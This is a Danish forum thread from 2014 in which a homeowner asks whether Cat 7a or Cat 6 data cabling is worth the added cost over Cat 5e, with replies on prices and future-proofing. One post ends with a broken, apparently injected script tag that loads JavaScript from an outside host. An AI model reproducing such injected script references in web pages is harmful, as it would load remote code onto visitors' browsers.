recordere.dk forum     Det danske community for hjemmets elektronik og indhold     Siden 2003
<b>Forside</b> Forside > Modtagelse og distribution > Distribution og udstyr generelt
  Nye indlæg Nye indlæg  Seneste forum emner Seneste   Seneste forum emner (vindue) Vindue   De emner du deltager i Mine emner RSS Feed - Nyt hus - Cat. 5e vs 7a
  FAQ FAQ  Søg i forum   Opret ny bruger Opret ny bruger  Log ind Log ind

Nyt hus - Cat. 5e vs 7a

 Besvar Besvar Side  123>
Forfatter
Besked
JSA:-) Se dropdown menu
Bruger
Bruger


Oprettet: 13-Maj-2007
Sted: Denmark
Status: Offline
Point: 67
Funktioner Funktioner   Tak (0) Tak(0)   Citér JSA:-) Citér  BesvarSvar Direkte link til dette indlæg Emne: Nyt hus - Cat. 5e vs 7a
    Sendt: 24-April-2014 kl. 17:36
Hej
Jeg skal til at bygge nyt hus med Huscompagniet.
I den forbindelse har jeg haft møde med elektrikeren vedr. dataudtag.
Et enkelt dataudtag med cat. 5a koster 1.250 og et tilsvarende i cat 7a koster ca 2.500.

Lige nu har jeg dataudtag for ca. 15.000 som vil blive forøget til 30.000 ved en cat. 7a installation. En cat. 6 vil "kun" betyde en merpris på ca. 7.000, men er der reel forskel på 5e og 6?

Er det pengene værd at få forøget den teoretiske hastighed 10 gange på nuværende tidspunkt, eller vurderer I, at udnyttelsen af denne båndbrede først vil blive udnyttet om mange år?

På forhånd tak.
Jesper
Til top
TiXe Se dropdown menu
Super bruger
Super bruger


Oprettet: 21-Juli-2008
Sted: Denmark
Status: Offline
Point: 270
Funktioner Funktioner   Tak (0) Tak(0)   Citér TiXe Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 17:44
Efter min mening er det ikke pengene værd. du vil ikke komme til at mangle noget som helst ved at "nøjes" med cat5e kabler. 

Gigabit Ethernet er rigeligt til alm husbehov. Også nørdens husbehov.
Til top
culrich Se dropdown menu
Bruger
Bruger


Oprettet: 19-December-2008
Sted: Denmark
Status: Offline
Point: 93
Funktioner Funktioner   Tak (0) Tak(0)   Citér culrich Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 17:59
Ja du kan rolig "nøjes" med Cat 5e.

Undre mig blot over prisforskellen er så stor. Prisforskellen i materialer er nok cirka det dobbelte, men arbejdslønnen er det samme.

100 meter Cat 7a koster omkring 700 ,- og et udtag 150 ,- Så du kommer langt for kr. 5.000 på materiale siden, - så hvis de skal bruge 40-50 timer på at trække det i et helt nyt hus; er det vist også betalt.

/CU
Til top
cnn3 Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 20-Oktober-2004
Sted: Århus
Status: Offline
Point: 3195
Funktioner Funktioner   Tak (0) Tak(0)   Citér cnn3 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-April-2014 kl. 22:54
Det lyder godt nok dyrt!! 

Jeg købte 3 dataudtag sidste år. dvs dåserne på væggen for ca 500 kr hos wattoo.dk,  dvs 3 fuga underlag, 3 rammer og 3 dataudtag, heraf 1 dobbelt, og 4 styk lexcom connectorer for  ca 500 kr.
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

Redigeret af cnn3 - 24-April-2014 kl. 22:54
mvh Christian
Til top
JSA:-) Se dropdown menu
Bruger
Bruger


Oprettet: 13-Maj-2007
Sted: Denmark
Status: Offline
Point: 67
Funktioner Funktioner   Tak (0) Tak(0)   Citér JSA:-) Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 01:16
Ja jeg har fundet ud af, at det er dyrt...

Det er problemet med at købe et nyt hus fra et typehusfirma og specielt Huscompagniet. De har en lav pris til at "fange" folk med, men når man så laver tilvalg, så koster det. Det ef på tilvalgene, de tjener deres penge. Hvis man som kunde har mange tilvalg, så tjener de meget og har man som kunde ikke så mange tilvalg, så løber det rundt for dem...

Det er bare noget træls noget at lave efterfølgende og skal op igennem dampspære. Det koster ca 1.000 at få trukket et tomrør for selv at kunne gøre det senere, så det er der heller ikke så meget fidus i...

Jesper
Til top
Mark RL Se dropdown menu
Bruger
Bruger


Oprettet: 25-Juni-2008
Sted: Denmark
Status: Offline
Point: 159
Funktioner Funktioner   Tak (0) Tak(0)   Citér Mark RL Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 06:32
Det er jo tosset den pris. Der jo slet ingen udfordringer i at lave det. De trækker jo allerede rør mm når indervægge er oppe. Det er så nemt for dem.

Må man ikke finde sin egen elektriker?

Mvh
Mark
Med venlig hilsen

Mark
Til top
HamDenFede Se dropdown menu
Super bruger
Super bruger
Avatar

Oprettet: 01-April-2007
Status: Offline
Point: 350
Funktioner Funktioner   Tak (0) Tak(0)   Citér HamDenFede Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 08:36
Enig. Det er ikke merprisen op til de 2500,- værd, men jeg synes ikke prisen på 1250,- lyder så voldsom, hvis alternativet er et rum helt uden stik. Altså materialer (tomrør, kabel og dåse) samt arbejdsløn for at få trukket rør og kabel, samt få det forbundet til hhv. stik og patchpanel i teknikrum. Da det er en totalentreprise med Huscompagniet, regner de sikkert også med, at der skal laves et ekstra hul i væggen hvor stikket skal sidde, derfor tager det længere tid for både murer, maler etc. etc.

Hvis jeg var dig ville jeg vælge den billige Cat 5 og undersøge om prisen ændrer sig væsentligt hvis der skal laves flere stik i samme rum. Hovedreglen er, at du aldrig kan få for mange stik. Jeg fik selv trukket to til hver rum da jeg byggede, men kunne godt bruge flere.
Mvh. HamDenFede
Til top
Bruger udmeldt 38 Se dropdown menu
--
--


Oprettet: 21-Maj-2006
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Bruger udmeldt 38 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 10:33
Man kan sikkert godt vælge egen elektrikker. Men ofte vil man få et fradrag i prisen på f.eks. 50.000,-, hvor en egen elektrikker så skal have 70.000,- for at udføre installationen - been there, done that.

M.v.h.
Til top
Jonas_R Se dropdown menu
Guld medlem
Guld medlem


Oprettet: 13-November-2006
Sted: Denmark
Status: Offline
Point: 765
Funktioner Funktioner   Tak (0) Tak(0)   Citér Jonas_R Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 10:47
Hvad er prisen hvis du tager cat6?
Til top
Bruger udmeldt 38 Se dropdown menu
--
--


Oprettet: 21-Maj-2006
Status: Offline
Point: 5
Funktioner Funktioner   Tak (0) Tak(0)   Citér Bruger udmeldt 38 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 11:45
Som der er skrevet: +7000,-

M.v.h.
Til top
SoundWave Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 12-Maj-2009
Status: Offline
Point: 817
Funktioner Funktioner   Tak (0) Tak(0)   Citér SoundWave Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 12:42
Jeg havde nok taget cat 7a, men det er udelukkende fordi der så ér fremtidssikret lidt. Det vil være irriterende at stå om 5-10 år og ønske der var mere båndbredde. Allerede nu kan man med en fornuftig NAS udfordre cat 5e og cat 6.
Det kommer naturligvis også an på hvilke krav du har og om du som person stiller krav til hastighed.

Jeg har en ven der i sommer fik renoveret sit hus. Jeg rådede ham til at huske at tænke i banerne af ny elinstallation, men det kunne han ikke lige overskue. Det kan han så godt nu, men nu er det ligesom "for sent", da alle væggene står nymalet.
Til top
Rasmusdc Se dropdown menu
Guld medlem
Guld medlem


Oprettet: 09-December-2007
Sted: Denmark
Status: Offline
Point: 1756
Funktioner Funktioner   Tak (0) Tak(0)   Citér Rasmusdc Citér  BesvarSvar Direkte link til dette indlæg Sendt: 25-April-2014 kl. 12:59
jeg må også indrømme jeg havde taget skærmet Cat7.. tog Cat6 i en ejendom jeg lavede for lang tid siden frem for cat 5 og det fortrød jeg ALDRIG.. med Cat6 lexcom metal i kontakterne..

Cat7 kan jo klare video signaler i højkvalitet, ved nogel fabrikanter hellere ville bruge det end HDMI da det var en standart, og visse stadig arbejder på det...

vil være lækkert at kunne bruge det sådan på tværs, så det bare er en splitter så CAT signal, så central video center, du kan jo også CAT konvertere HDMI hvis du vil...

der er så mange muligeheder..

kan cat7a ikke også rive 100watt hvis det er nødvendigt? der var da ihvertfald et tv der var drevet af ET cat kabel på et tidspunkt... men det er jeg dog ikke sikker på.

jeg forstår ikke din priser..

gav tilbage dengang vi lavede hus for mange år siden, 75kr pr Lexcom 5E con og 100kr for 6A for den metal dims der lavede selve stikket, og gav godt 25 kr for rammen + 10 kr for en indsats som kunne have 2 konnektorer i, til en alm stik kontakt størrelse, som passer i LK kontakterne..

gav 2000kr for HELE huset.

http://www.elvvs.dk/p/konnector-lexcom-250-utp-cat-6-10-31699/

lexcom 250 connector 88 kr
lexcom 500 connector 123kr (6A)

de er SÅ lette at lave... det er snap lås der selv klipper så man bare skal tage resterne med en tang, og alt er farvekodet, så man ikke kan lave fejl.. samlede 22 af dem uden en eneste fejlmontering. og holder stadig i dag 6 år efter.

så reelt få dem til at trække rør, så træk selv kabler, hvis de bare støber de rå kabeldåser i væggen, så er det 5 minutter pr kontakt du vil lave.. så kan du også reroute kabler.

Redigeret af Rasmusdc - 25-April-2014 kl. 13:01
Til top
 
 Besvar Besvar Side  123>
 
Skift forum Forum-tilladelser Se dropdown menu